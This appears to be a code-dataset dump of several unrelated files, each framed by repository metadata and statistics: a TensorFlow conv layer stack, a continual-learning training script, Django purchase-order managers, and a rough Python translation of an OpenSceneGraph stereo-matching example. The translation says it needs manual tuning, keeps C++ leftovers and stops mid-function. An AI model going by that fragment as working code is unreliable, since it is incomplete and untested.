xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 256
|
2019-05-30T04:44:01.000Z
|
2022-03-30T15:02:15.000Z
|
python/models/fast_conv_segment.py
|
xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 49
|
2019-06-16T16:16:24.000Z
|
2022-03-03T10:12:24.000Z
|
python/models/fast_conv_segment.py
|
xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 74
|
2019-05-07T16:40:51.000Z
|
2022-02-14T21:56:59.000Z
|
from models.network_segment_interface import NetworkSegmentInterface
import tensorflow as tf
class FastConvSegment(NetworkSegmentInterface):
    """Small feed-forward conv stack applied to 256x256-resized inputs.

    The original implementation repeated fifteen nearly identical
    ``tf.layers.conv2d`` calls; the layer configuration is collapsed into a
    declarative table so the architecture can be read (and edited) at a
    glance while producing the exact same graph.
    """

    # One entry per conv layer:
    # (filters, kernel_size, strides, padding, use_leaky_relu).
    # strides=1 / padding='valid' are tf.layers.conv2d defaults, matching
    # the original calls that omitted those arguments.
    _CONV_SPECS = [
        (16, 3, 1, 'valid', True),
        (16, 3, 1, 'valid', True),
        (32, 3, 1, 'valid', True),
        (32, 2, 2, 'same', False),   # strided conv acts as downsampling
        (32, 3, 1, 'valid', True),
        (32, 3, 1, 'valid', True),
        (32, 3, 1, 'valid', True),
        (32, 3, 1, 'valid', True),
        (32, 2, 1, 'same', False),
        (48, 3, 1, 'valid', True),
        (48, 3, 1, 'valid', True),
        (48, 3, 1, 'valid', True),
        (48, 3, 1, 'valid', True),
        (128, 1, 1, 'valid', True),  # 1x1 convs: channel mixing head
        (128, 1, 1, 'valid', True),
    ]

    def build_network_segment(self, inputs):
        """Return the output tensor of the conv stack applied to ``inputs``.

        :param inputs: image tensor; resized to 256x256 before the convs.
        :return: the final feature-map tensor.
        """
        graph = tf.image.resize_images(inputs, size=(256, 256))
        for filters, kernel_size, strides, padding, activate in self._CONV_SPECS:
            graph = tf.layers.conv2d(
                graph,
                filters=filters,
                kernel_size=kernel_size,
                strides=strides,
                padding=padding,
                activation=tf.nn.leaky_relu if activate else None)
        return graph
| 60.387097
| 111
| 0.719551
| 274
| 1,872
| 4.791971
| 0.153285
| 0.090632
| 0.158416
| 0.231531
| 0.813404
| 0.813404
| 0.789794
| 0.789794
| 0.789794
| 0.789794
| 0
| 0.046057
| 0.153312
| 1,872
| 30
| 112
| 62.4
| 0.782334
| 0.053953
| 0
| 0.590909
| 0
| 0
| 0.004522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.090909
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8da8a664b0fba0b673b69bf4a1bff539b52dc2d
| 23,083
|
py
|
Python
|
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | 3
|
2021-05-10T20:41:09.000Z
|
2021-11-24T18:47:58.000Z
|
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | null | null | null |
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | 1
|
2021-05-14T14:21:16.000Z
|
2021-05-14T14:21:16.000Z
|
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import yaml
import pickle
import signal
import time
from options import TrainParser
from core.models.stam_wrapper import StamWrapper
from core.models.gem_wrapper import GEMWrapper
from core.models.mas_wrapper import MASWrapper
from core.utils import *
from core.dataset import *
from core.config import *
from core.data_sampling import *
from core.distance_metrics import *
from core.checkpoints import *
#from plots import *
def run_train(results, trial, args, configs):
    """Train a model on the datastream for one trial, checkpointing each phase.

    Fixes over the original:
      * ``model`` was never instantiated here, so ``model.train(...)``
        raised ``NameError`` on every call — the model is now constructed
        exactly as ``run_trial`` does.
      * model-specific configs were reloaded *after* ``train_params``,
        ``num_classes`` etc. had already been read from the stale dict, and
        the reload also discarded ``configs['seed']``; the reload now
        happens first.

    :param results: results dict (unused here; kept for call-site compatibility)
    :param trial: zero-based trial index, also used as the random seed
    :param args: parsed command-line arguments
    :param configs: experiment configuration dict (replaced by the
        model-specific configs below)

    NOTE(review): relies on module-level globals created in ``__main__``
    (``stream``, ``x_``, ``y_``, ``x_eval``, ``y_eval``).
    """
    # reset random seed so each trial is reproducible
    np.random.seed(trial)

    # Reload model-specific configs FIRST so every value read below comes
    # from the dict that is actually used for training.
    if args.model_name == 'stam':
        configs = load_stam_configs(args)
    if args.model_name == 'gem':
        configs = load_gem_configs(args)
    if args.model_name == 'mas':
        configs = load_mas_configs(args)
    configs['seed'] = trial

    print('**************************************************')
    print('TRIAL ', str(trial+1))
    print('**************************************************')

    # Trial Params
    num_classes = configs['num_classes']
    num_phases = configs['num_phases']

    # Datastream (module-level `stream` built in __main__)
    datastream = stream['datastream']
    tasks_set = stream['tasks_set']

    # Extra Experimental Params
    train_params = configs['train_params']

    # Instantiate the model (mirrors run_trial; the original referenced an
    # undefined `model` name here).
    if args.model_name == 'stam':
        model = StamWrapper(configs)
    if args.model_name == 'gem':
        model = GEMWrapper(configs)
    if args.model_name == 'mas':
        model = MASWrapper(configs)

    x_train, y_train, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
                                                         datastream, num_classes,
                                                         num_phases, args)

    if args.vis:
        model.pick_sample_images(x_test[0][0], y_test[0][0])

    # for each incremental phase
    for phase in range(num_phases):
        class_tasks = tasks_set[phase]

        # train from unlabeled data
        print('Phase ' + str(phase+1) + ':')
        print('Learning from data stream...')
        print('Class Distribution {}'.format(np.bincount(y_train[phase], minlength=num_classes)))
        model.train(x_train[phase], y_train[phase], phase+1, train_params)
        save_checkpoint(None, model, trial, phase, args.log, args.dataset)
def run_test(log, trial, results, args, configs):
    """Evaluate previously checkpointed models for one trial.

    For every incremental phase, loads the model checkpoint saved by a
    training run, shows it the labeled "supervision" split, then scores
    classification and clustering on the query split, writing scores into
    the pre-allocated arrays in ``results``.

    :param log: unused in this body — caller passes ``args.load_log``,
        which is read directly from ``args`` below; TODO confirm intent
    :param trial: zero-based trial index, also used as the random seed
    :param results: dict of pre-allocated numpy result arrays (mutated)
    :param args: parsed command-line arguments
    :param configs: experiment configuration dict
    :return: the (mutated) ``results`` dict

    NOTE(review): relies on module-level globals built in ``__main__``
    (``stream``, ``x_``, ``y_``, ``x_eval``, ``y_eval``).
    """
    # reset random seed
    np.random.seed(trial)
    configs['seed'] = trial

    print('**************************************************')
    print('TRIAL ', str(trial+1))
    print('**************************************************')

    # Trial Params
    num_classes = configs['num_classes']
    num_phases = configs['num_phases']

    # Accuracy Models
    classifiers = configs['classifiers']
    clustering_models = configs['clustering_models']

    # Datastream
    datastream = stream['datastream']
    stream_name = stream['stream_name']
    tasks_string = stream['tasks_string']
    tasks_set = stream['tasks_set']

    # Extra Experimental Params
    supervise_params = configs['supervise_params']
    classify_params = configs['classify_params']
    cluster_params = configs['cluster_params']

    # Only the test split is needed here; train arrays are discarded.
    _, _, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
                                             datastream, num_classes,
                                             num_phases, args)

    l_eval = configs['l_eval']

    # for each incremental phase
    for phase in range(args.start_phase-1, num_phases):
        class_tasks = tasks_set[phase]

        # train from unlabeled data
        print('Phase ' + str(phase+1) + ':')

        # Restore the model checkpointed at this phase by the training run.
        _, model = load_checkpoint(trial, phase, args.load_log, args.dataset, test=True)

        model.plot_directory = configs['plot_directory']
        model.vis_cluster = configs['visualize_cluster']
        model.vis_train = configs['visualize_train']

        # do not always have task to evaluate
        if len(class_tasks) > 0:
            # reset stored classification info
            model.setTask(args.ntp, len(np.unique(class_tasks[0])))

            # for num_tasks time (number tasks per phase)
            for sample in range(args.ntp):
                # Show eval sample number
                print(' Sample ' + str(sample+1) + '/' + str(args.ntp))

                # labeled data (supervision)
                x_supervise = x_test[sample][1]
                y_supervise = y_test[sample][1]

                # querry data (evaluation)
                x_query = x_test[sample][0]
                y_query = y_test[sample][0]

                # for all tasks
                for ti, task in enumerate(class_tasks):
                    # get tasks (i.e. classes for classification task)
                    t_string = tasks_string[ti]

                    # get task labeled data and eval data
                    x_query_t = x_query[np.isin(y_query, task)]
                    y_query_t = y_query[np.isin(y_query, task)].astype(int)
                    x_supervise_t = x_supervise[np.isin(y_supervise, task)]
                    y_supervise_t = y_supervise[np.isin(y_supervise, task)].astype(int)

                    print('Task: ' + str(task))
                    print('Total Labeled Examples Per Class ' + str(np.bincount(y_supervise_t, minlength=num_classes)))
                    print('Total Test Examples Per Class ' + str(np.bincount(y_query_t, minlength=num_classes)))

                    # supervision
                    print(' Showing supervision...')
                    model.supervise(x_supervise_t, y_supervise_t, phase,
                                    supervise_params, l_list=l_eval, index=sample)

                    # Percent of class informative centroids
                    if args.model_name == 'stam':
                        ci_score, ci_score_pc, multi_ci = model.get_ci(phase, sample, args.vis)
                        results['class_informative'][trial, sample, phase, ti, :] = ci_score
                        results['class_informative_pc'][trial, sample, phase, ti, :, :] = ci_score_pc
                        results['class_informative_multi'][trial, sample, phase, ti, :] = multi_ci

                    if args.vis and args.model_name == 'stam':
                        model.detailed_classification_plots()

                    # classification and evalution
                    print(' Eval Task: ' + t_string)
                    print(' Classifying...')

                    confusion_matrices = np.zeros((len(classifiers), num_classes, num_classes))
                    for ci, classifier in enumerate(classifiers):
                        # Weakly supervised predictions
                        y_predict = model.classify(x_query_t, phase, classifier,
                                                   sample, classify_params).astype(int)

                        # Calculate Confusion Matrix for Predictions
                        # (plotted only once per task, on the first sample)
                        if args.vis and sample == 0:
                            for cf in range(len(y_predict)):
                                confusion_matrices[ci, int(y_query_t[cf]), int(y_predict[cf])] += 1
                            plt.imshow(confusion_matrices[0], cmap='hot', interpolation='nearest')
                            plt.ylabel("True Class")
                            plt.xlabel("Predicted Class")
                            plt.xticks(np.arange(num_classes))
                            plt.yticks(np.arange(num_classes))
                            for i in range(num_classes):
                                for j in range(num_classes):
                                    text = plt.text(j, i, confusion_matrices[0, i, j], ha="center", va="center", color="w")
                            plt.savefig(smart_dir(model.plot_directory + '/phase_{}/'.format(phase)) + 'confusion_matrix.png')
                            plt.close()

                        # all class results
                        score = 100 * np.mean(y_query_t == y_predict)
                        print(' ' + classifier + ': ' \
                            + str(score) + '%')
                        if args.model_name == 'stam':
                            print(' ' + classifier + ': ' \
                                + str(ci_score), ' % class informative')
                            print(' ' + classifier + ': ' \
                                + str(multi_ci), ' % class informative - more than 1')

                        # per class results
                        score_pc = [100 * np.mean(y_query_t[np.where(y_query_t == k)] \
                            == y_predict[np.where(y_query_t == k)]) for k in task]

                        results['classification_accuracy'][trial, sample, phase, ti, ci] = score
                        results['classification_accuracy_pc'][trial, sample, phase, ti, ci, :len(task)] = score_pc

                    for ci, cluster_method in enumerate(clustering_models):
                        acc, pc_acc = model.cluster(x_query_t, y_query_t, phase,
                                                    sample, args.dataset, num_classes,
                                                    cluster_params[ci],
                                                    cluster_method, eval_layers=l_eval)
                        print(' ' + cluster_method + ': ' \
                            + str(acc) + '%')
                        print(ti, ci)
                        results['clustering_acc'][trial, sample, phase, ti, ci] = acc
                        results['clustering_acc_pc'][trial, sample, phase, ti, ci, :] = pc_acc

    # STAM exposes per-layer long-term-memory growth histories;
    # NOTE(review): overwritten each trial rather than accumulated — confirm.
    if args.model_name == 'stam':
        results['ltm_growth'] = [model.layers[0].ltm_history, model.layers[1].ltm_history, model.layers[2].ltm_history]

    return results
def run_trial(trial, results, args, configs):
    """Run one full trial: train per phase, then evaluate in the same pass.

    Combines the work of ``run_train`` and ``run_test``: for each incremental
    phase the model is trained on the unlabeled stream, checkpointed, shown
    the labeled supervision split, and scored on classification and
    clustering, with scores written into the pre-allocated ``results`` arrays.

    :param trial: zero-based trial index, also used as the random seed
    :param results: dict of pre-allocated numpy result arrays (mutated)
    :param args: parsed command-line arguments
    :param configs: experiment configuration dict
    :return: the (mutated) ``results`` dict

    NOTE(review): relies on module-level globals built in ``__main__``
    (``stream``, ``x_``, ``y_``, ``x_eval``, ``y_eval``).
    """
    # reset random seed
    np.random.seed(trial)
    configs['seed'] = trial

    # Trial Params
    num_classes = configs['num_classes']
    num_phases = configs['num_phases']

    # Accuracy Models
    classifiers = configs['classifiers']
    clustering_models = configs['clustering_models']

    # Datastream
    datastream = stream['datastream']
    stream_name = stream['stream_name']
    tasks_string = stream['tasks_string']
    tasks_set = stream['tasks_set']

    # Extra Experimental Params
    train_params = configs['train_params']
    supervise_params = configs['supervise_params']
    classify_params = configs['classify_params']
    cluster_params = configs['cluster_params']

    # print trial number
    print('**************************************************')
    print('TRIAL ', str(trial+1))
    print('**************************************************')

    # Instantiate the selected continual-learning model wrapper.
    if args.model_name == 'stam':
        model = StamWrapper(configs)
    if args.model_name == 'gem':
        model = GEMWrapper(configs)
    if args.model_name == 'mas':
        model = MASWrapper(configs)

    x_train, y_train, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
                                                         datastream, num_classes,
                                                         num_phases, args)

    l_eval = configs['l_eval']

    if args.vis:
        model.pick_sample_images(x_test[0][0], y_test[0][0])

    # for each incremental phase
    for phase in range(args.start_phase-1, num_phases):
        class_tasks = tasks_set[phase]

        # train from unlabeled data
        print('Phase ' + str(phase+1) + ':')
        print('Learning from data stream...')
        print('Class Distribution {}'.format(np.bincount(y_train[phase], minlength=num_classes)))
        # NOTE(review): assumes the model exposes `.layers` (true for STAM;
        # confirm for GEM/MAS wrappers).
        print(model.layers[0].im_seen)
        model.train(x_train[phase], y_train[phase], phase+1, train_params)
        save_checkpoint(results, model, trial, phase, args.log, args.dataset)

        # do not always have task to evaluate
        if len(class_tasks) > 0:
            # reset stored classification info
            model.setTask(args.ntp, len(np.unique(class_tasks[0])))

            # for num_tasks time (number tasks per phase)
            for sample in range(args.ntp):
                # Show eval sample number
                print(' Sample ' + str(sample+1) + '/' + str(args.ntp))

                # labeled data (supervision)
                x_supervise = x_test[sample][1]
                y_supervise = y_test[sample][1]

                # querry data (evaluation)
                x_query = x_test[sample][0]
                y_query = y_test[sample][0]

                # for all tasks
                for ti, task in enumerate(class_tasks):
                    # get tasks (i.e. classes for classification task)
                    t_string = tasks_string[ti]

                    # get task labeled data and eval data
                    x_query_t = x_query[np.isin(y_query, task)]
                    y_query_t = y_query[np.isin(y_query, task)].astype(int)
                    x_supervise_t = x_supervise[np.isin(y_supervise, task)]
                    y_supervise_t = y_supervise[np.isin(y_supervise, task)].astype(int)

                    print('Task: ' + str(task))
                    print('Total Labeled Examples Per Class ' + str(np.bincount(y_supervise_t, minlength=num_classes)))
                    print('Total Test Examples Per Class ' + str(np.bincount(y_query_t, minlength=num_classes)))

                    # supervision
                    print(' Showing supervision...')
                    model.supervise(x_supervise_t, y_supervise_t, phase,
                                    supervise_params, l_list=l_eval, index=sample)

                    # Percent of class informative centroids
                    if args.model_name == 'stam':
                        ci_score, ci_score_pc, multi_ci = model.get_ci(phase, sample, args.vis)
                        results['class_informative'][trial, sample, phase, ti, :] = ci_score
                        results['class_informative_pc'][trial, sample, phase, ti, :, :] = ci_score_pc
                        results['class_informative_multi'][trial, sample, phase, ti, :] = multi_ci

                    if args.vis and args.model_name == 'stam':
                        model.detailed_classification_plots()

                    # classification and evalution
                    print(' Eval Task: ' + t_string)
                    print(' Classifying...')

                    confusion_matrices = np.zeros((len(classifiers), num_classes, num_classes))
                    for ci, classifier in enumerate(classifiers):
                        # Weakly supervised predictions
                        y_predict = model.classify(x_query_t, phase, classifier,
                                                   sample, classify_params).astype(int)

                        # Calculate Confusion Matrix for Predictions
                        # (plotted only once per task, on the first sample)
                        if args.vis and sample == 0:
                            for cf in range(len(y_predict)):
                                confusion_matrices[ci, int(y_query_t[cf]), int(y_predict[cf])] += 1
                            plt.imshow(confusion_matrices[0], cmap='hot', interpolation='nearest')
                            plt.ylabel("True Class")
                            plt.xlabel("Predicted Class")
                            plt.xticks(np.arange(num_classes))
                            plt.yticks(np.arange(num_classes))
                            for i in range(num_classes):
                                for j in range(num_classes):
                                    text = plt.text(j, i, confusion_matrices[0, i, j], ha="center", va="center", color="w")
                            plt.savefig(smart_dir(model.plot_directory + '/phase_{}/'.format(phase)) + 'confusion_matrix.png')
                            plt.close()

                        # all class results
                        score = 100 * np.mean(y_query_t == y_predict)
                        print(' ' + classifier + ': ' \
                            + str(score) + '%')
                        if args.model_name == 'stam':
                            print(' ' + classifier + ': ' \
                                + str(ci_score), ' % class informative')
                            print(' ' + classifier + ': ' \
                                + str(multi_ci), ' % class informative - more than 1')

                        # per class results
                        score_pc = [100 * np.mean(y_query_t[np.where(y_query_t == k)] \
                            == y_predict[np.where(y_query_t == k)]) for k in task]

                        results['classification_accuracy'][trial, sample, phase, ti, ci] = score
                        results['classification_accuracy_pc'][trial, sample, phase, ti, ci, :len(task)] = score_pc

                    for ci, cluster_method in enumerate(clustering_models):
                        acc, pc_acc = model.cluster(x_query_t, y_query_t, phase,
                                                    sample, args.dataset, num_classes,
                                                    cluster_params[ci],
                                                    cluster_method, eval_layers=l_eval)
                        print(' ' + cluster_method + ': ' \
                            + str(acc) + '%')
                        results['clustering_acc'][trial, sample, phase, ti, ci] = acc
                        results['clustering_acc_pc'][trial, sample, phase, ti, ci, :] = pc_acc

    # STAM exposes per-layer long-term-memory growth histories;
    # NOTE(review): overwritten each trial rather than accumulated — confirm.
    if args.model_name == 'stam':
        results['ltm_growth'] = [model.layers[0].ltm_history, model.layers[1].ltm_history, model.layers[2].ltm_history]

    return results
if __name__ == "__main__":
    trial = 0
    plt.rc('image', cmap='gray')

    # Parse CLI arguments and load model-specific configuration.
    parser = TrainParser()
    args = parser.parse()

    if args.model_name == 'stam':
        configs = load_stam_configs(args)
    if args.model_name == 'gem':
        configs = load_gem_configs(args)
    if args.model_name == 'mas':
        configs = load_mas_configs(args)

    # load dataset
    # x_/y_, x_eval/y_eval and `stream` become de-facto globals read by
    # run_train / run_test / run_trial.
    (x_, y_), (x_eval, y_eval), configs = load_dataset(configs, args)
    stream, configs = form_datastream(args.schedule_flag, configs)

    # Result storage init
    # Arrays are filled with -1 so unwritten cells are distinguishable
    # from real (non-negative) scores.
    results = {}
    results['classification_accuracy'] = -1 * np.ones((configs['num_trials'],
                                                       configs['num_samples'],
                                                       configs['num_phases'],
                                                       configs['num_tasks'],
                                                       configs['num_classifiers'],
                                                       ))

    results['classification_accuracy_pc'] = -1 * np.ones((configs['num_trials'],
                                                          configs['num_samples'],
                                                          configs['num_phases'],
                                                          configs['num_tasks'],
                                                          configs['num_classifiers'],
                                                          configs['num_classes']
                                                          ))

    results['clustering_acc'] = -1 * np.ones((configs['num_trials'],
                                              configs['num_samples'],
                                              configs['num_phases'],
                                              configs['num_tasks'],
                                              configs['num_cluster_models'],
                                              ))

    results['clustering_acc_pc'] = -1 * np.ones((configs['num_trials'],
                                                 configs['num_samples'],
                                                 configs['num_phases'],
                                                 configs['num_tasks'],
                                                 configs['num_cluster_models'],
                                                 configs['num_classes']
                                                 ))

    results['task_3_acc'] = -1 * np.ones((configs['num_trials'],
                                          configs['num_samples'],
                                          configs['num_phases'],
                                          configs['num_tasks'],
                                          ))

    results['task_3_acc_pc'] = -1 * np.ones((configs['num_trials'],
                                             configs['num_samples'],
                                             configs['num_phases'],
                                             configs['num_tasks'],
                                             configs['num_classes']
                                             ))

    # STAM-only diagnostics: class-informative centroid scores per layer.
    if args.model_name == 'stam':
        results['class_informative'] = -1 * np.ones((configs['num_trials'],
                                                     configs['num_samples'],
                                                     configs['num_phases'],
                                                     configs['num_tasks'],
                                                     configs['num_layers']
                                                     ))

        results['class_informative_pc'] = -1 * np.ones((configs['num_trials'],
                                                        configs['num_samples'],
                                                        configs['num_phases'],
                                                        configs['num_tasks'],
                                                        configs['num_layers'],
                                                        configs['num_classes']
                                                        ))

        results['class_informative_multi'] = -1 * np.ones((configs['num_trials'],
                                                           configs['num_samples'],
                                                           configs['num_phases'],
                                                           configs['num_tasks'],
                                                           configs['num_layers']
                                                           ))

    # save parameters
    parser.save_args(smart_dir('logs/' + args.log + '/' + args.dataset) + 'user_settings.yml')
    save_file = smart_dir('logs/' + args.log) + 'training_configs.yml'
    with open(save_file, 'w') as yaml_file:
        yaml.dump(configs, yaml_file)

    # Dispatch on run mode.
    # NOTE(review): if none of train_only/test_only/train_test is set,
    # nothing runs and an all -1 results.pkl is written — confirm intended.
    if args.train_only:
        print("Training Only")
        for trial in range(args.ntrials):
            run_train(results, trial, args, configs)
    elif args.test_only:
        print("Testing Only")
        for trial in range(args.start_trial - 1, args.ntrials):
            results = run_test(args.load_log, trial, results, args, configs)
    elif args.train_test:
        print("Full Trial")
        for trial in range(args.start_trial-1, args.ntrials):
            results = run_trial(trial, results, args, configs)

    with open(configs['results_directory'] + 'results.pkl', 'wb') as handle:
        pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 41.892922
| 126
| 0.485292
| 2,258
| 23,083
| 4.738707
| 0.104517
| 0.049533
| 0.021869
| 0.02243
| 0.855888
| 0.84271
| 0.829626
| 0.820748
| 0.820748
| 0.820748
| 0
| 0.005432
| 0.401854
| 23,083
| 550
| 127
| 41.969091
| 0.769537
| 0.063207
| 0
| 0.801749
| 0
| 0
| 0.124368
| 0.023928
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008746
| false
| 0
| 0.049563
| 0
| 0.06414
| 0.125364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
512f9407a56e601e341f9aa5d0f7314a747952a4
| 1,284
|
py
|
Python
|
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
from django.db import models
import datetime
class POManager(models.Manager):
    """Manager exposing purchase-order querysets filtered by status."""

    def get_queryset(self):
        return super().get_queryset()

    def all_pending_po(self):
        # '-created' ordering (original comment called this FIFO;
        # '-created' is newest-first — verify against requirements)
        pending = super().get_queryset().filter(status='Pending')
        return pending.order_by('-created')

    def all_cancel_po(self):
        cancelled = super().get_queryset().filter(status='Cancelled')
        return cancelled.order_by('-created')

    def all_rejected_po(self):
        rejected = super().get_queryset().filter(status='Rejected')
        return rejected.order_by('-created')

    def all_approved_po(self):
        return super().get_queryset().filter(status='Approved')

    def current_year_leaves(self):
        # NOTE(review): "leaves" naming looks copied from a leave-request
        # manager — confirm it belongs on purchase orders.
        this_year = datetime.date.today().year
        return super().get_queryset().filter(startdate__year=this_year)
class RFManager(models.Manager):
    """Manager exposing requisition-form querysets filtered by status.

    NOTE(review): duplicates POManager's status filters — consider a
    shared base manager.
    """

    def get_queryset(self):
        return super().get_queryset()

    def all_pending_po(self):
        # '-created' ordering (original comment called this FIFO;
        # '-created' is newest-first — verify against requirements)
        pending = super().get_queryset().filter(status='Pending')
        return pending.order_by('-created')

    def all_cancel_po(self):
        cancelled = super().get_queryset().filter(status='Cancelled')
        return cancelled.order_by('-created')

    def all_rejected_po(self):
        rejected = super().get_queryset().filter(status='Rejected')
        return rejected.order_by('-created')

    def all_approved_po(self):
        return super().get_queryset().filter(status='Approved')
| 24.692308
| 101
| 0.69704
| 165
| 1,284
| 5.187879
| 0.218182
| 0.167056
| 0.192757
| 0.231308
| 0.859813
| 0.859813
| 0.82243
| 0.82243
| 0.82243
| 0.82243
| 0
| 0
| 0.153427
| 1,284
| 51
| 102
| 25.176471
| 0.787489
| 0.021807
| 0
| 0.769231
| 0
| 0
| 0.089457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.423077
| false
| 0
| 0.076923
| 0.423077
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 12
|
5aba024208a465010284c738dc5bd141dc5a8720
| 35,975
|
py
|
Python
|
examples/rough_translated1/osgstereomatch.py
|
JaneliaSciComp/osgpyplusplus
|
a5ae3f69c7e9101a32d8cc95fe680dab292f75ac
|
[
"BSD-3-Clause"
] | 17
|
2015-06-01T12:19:46.000Z
|
2022-02-12T02:37:48.000Z
|
examples/rough_translated1/osgstereomatch.py
|
cmbruns/osgpyplusplus
|
f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75
|
[
"BSD-3-Clause"
] | 7
|
2015-07-04T14:36:49.000Z
|
2015-07-23T18:09:49.000Z
|
examples/rough_translated1/osgstereomatch.py
|
cmbruns/osgpyplusplus
|
f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75
|
[
"BSD-3-Clause"
] | 7
|
2015-11-28T17:00:31.000Z
|
2020-01-08T07:00:59.000Z
|
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgstereomatch"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgViewer
# Translated from file 'osgstereomatch.cpp'
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osg/Vec3>
#include <osg/Vec4>
#include <osg/Quat>
#include <osg/Matrix>
#include <osg/ShapeDrawable>
#include <osg/Geometry>
#include <osg/Geode>
#include <osg/TextureRectangle>
#include <osgDB/FileUtils>
#include <osgDB/ReadFile>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <iostream>
#include "StereoPass.h"
#include "StereoMultipass.h"
def createScene(left, right, min_disp, max_disp, window_size, single_pass):
    """Build the scene graph: four display quads plus the stereo passes.

    The rough machine translation left several C++ constructs in place
    (``osg.StateSet geomss[4]``, ``osg.TextureRectangle texture[4]``,
    ``for (int i=0i<4i++)``, ``int xoff, zoff``) that are syntax errors in
    Python; they are replaced with list pre-allocation, ``range(4)``, and
    plain assignments. Behavior otherwise follows the original line-for-line.

    :param left: left input image (osg.Image); its s()/t() give quad size
    :param right: right input image (osg.Image)
    :param min_disp: minimum disparity to start matching pixels
    :param max_disp: maximum disparity to stop matching pixels
    :param window_size: matching window size around each pixel
    :param single_pass: if True use StereoPass, else StereoMultipass
    :return: the root osg.Group of the assembled scene
    """
    width = left.s()
    height = left.t()

    topnode = osg.Group()

    # create four quads so we can display up to four images
    geode = osg.Geode()

    # each geom will contain a quad
    da = osg.DrawArrays(osg.PrimitiveSet.QUADS, 0, 4)

    colors = osg.Vec4Array()
    colors.push_back(osg.Vec4(1.0, 1.0, 1.0, 1.0))

    tcoords = osg.Vec2Array()  # texture coords
    tcoords.push_back(osg.Vec2(0, 0))
    tcoords.push_back(osg.Vec2(width, 0))
    tcoords.push_back(osg.Vec2(width, height))
    tcoords.push_back(osg.Vec2(0, height))

    # statesets where we can attach textures (was invalid C++-style
    # array declarations in the rough translation)
    geomss = [None] * 4
    texture = [None] * 4

    for i in range(4):
        vcoords = osg.Vec3Array()  # vertex coords
        geom = osg.Geometry()

        # tile the quads on the screen
        #  2 3
        #  0 1
        xoff = i % 2
        zoff = 1 if i > 1 else 0

        # initial viewer camera looks along y
        vcoords.push_back(osg.Vec3d(0 + (xoff * width), 0, 0 + (zoff * height)))
        vcoords.push_back(osg.Vec3d(width + (xoff * width), 0, 0 + (zoff * height)))
        vcoords.push_back(osg.Vec3d(width + (xoff * width), 0, height + (zoff * height)))
        vcoords.push_back(osg.Vec3d(0 + (xoff * width), 0, height + (zoff * height)))

        geom.setVertexArray(vcoords)
        geom.setTexCoordArray(0, tcoords)
        geom.addPrimitiveSet(da)
        geom.setColorArray(colors, osg.Array.BIND_OVERALL)

        geomss[i] = geom.getOrCreateStateSet()
        # NOTE(review): bare GL_LIGHTING kept from the original — it is not
        # defined in this module; likely needs osg.GL_LIGHTING. Confirm.
